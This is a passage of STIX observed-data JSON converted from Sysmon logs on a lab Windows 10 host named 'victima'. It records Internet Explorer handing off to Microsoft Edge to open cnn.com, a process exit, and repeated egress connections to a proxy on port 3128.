| "command_line": "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" http://www.ibm.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 3868, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=1 --customer-type=1 -- \"http://cnn.com/\"", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:34.666649222Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:28.226Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b10-62e1-e901-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.076Z", | |
| "last_observed": "2022-07-27T14:26:24.076Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--c761ef49-5169-4150-aed7-2529bb8a3f5a", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.924Z", | |
| "modified": "2022-07-28T16:05:22.924Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:34.667316350Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:28.228Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50171, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:Vqjp50Q2Up6tQyXez3gXh2Z9tfc=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:23.204Z", | |
| "last_observed": "2022-07-27T14:26:23.204Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--58c98ef3-70d8-4d6b-997a-083851e36eca", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.924Z", | |
| "modified": "2022-07-28T16:05:22.924Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b10-62e1-e901-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b10-62e1-ea01-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 3868, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=1 --customer-type=1 -- \"http://cnn.com/\"" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 4468, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=1 --customer-type=1 --single-argument http://cnn.com/", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:34.667946104Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:28.228Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b10-62e1-e901-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b10-62e1-ea01-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.381Z", | |
| "last_observed": "2022-07-27T14:26:24.381Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--4b282b75-79c6-4098-815d-5410eb2da25c", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.924Z", | |
| "modified": "2022-07-28T16:05:22.924Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 3868, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:26:34.668615715Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:28.228Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b10-62e1-e901-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.398Z", | |
| "last_observed": "2022-07-27T14:26:24.398Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--261f9a0c-ba25-412d-8086-af2277b35049", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.925Z", | |
| "modified": "2022-07-28T16:05:22.925Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:34.670017733Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:28.244Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50172, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:D4QcjLgyUimy5T6Evf6zexGDgTU=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:23.346Z", | |
| "last_observed": "2022-07-27T14:26:23.346Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--e4da04ae-b610-4105-a217-2f464ec125f9", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.925Z", | |
| "modified": "2022-07-28T16:05:22.925Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:34.670644117Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:28.244Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50173, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:v+fY6YHliP4Izto+waHOyYgt9vY=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:23.375Z", | |
| "last_observed": "2022-07-27T14:26:23.375Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--00ef797f-8014-4485-b88a-3fedbea7cca7", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.925Z", | |
| "modified": "2022-07-28T16:05:22.925Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:37.165227877Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:30.659Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50174, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:BFxSyIkSTRb3erE/OdpBITjYWxo=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.134Z", | |
| "last_observed": "2022-07-27T14:26:24.134Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--4b162c89-6fa1-410b-bc44-f3dbe9d01440", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.926Z", | |
| "modified": "2022-07-28T16:05:22.926Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:37.166101780Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:30.659Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50175, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:1SoMdnVeDONqIuWuqnuZmNDLS7I=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:24.282Z", | |
| "last_observed": "2022-07-27T14:26:24.282Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--b6058faf-ba70-4534-ae42-e5fefcb021cb", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.926Z", | |
| "modified": "2022-07-28T16:05:22.926Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:37.166857191Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:30.659Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50176, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
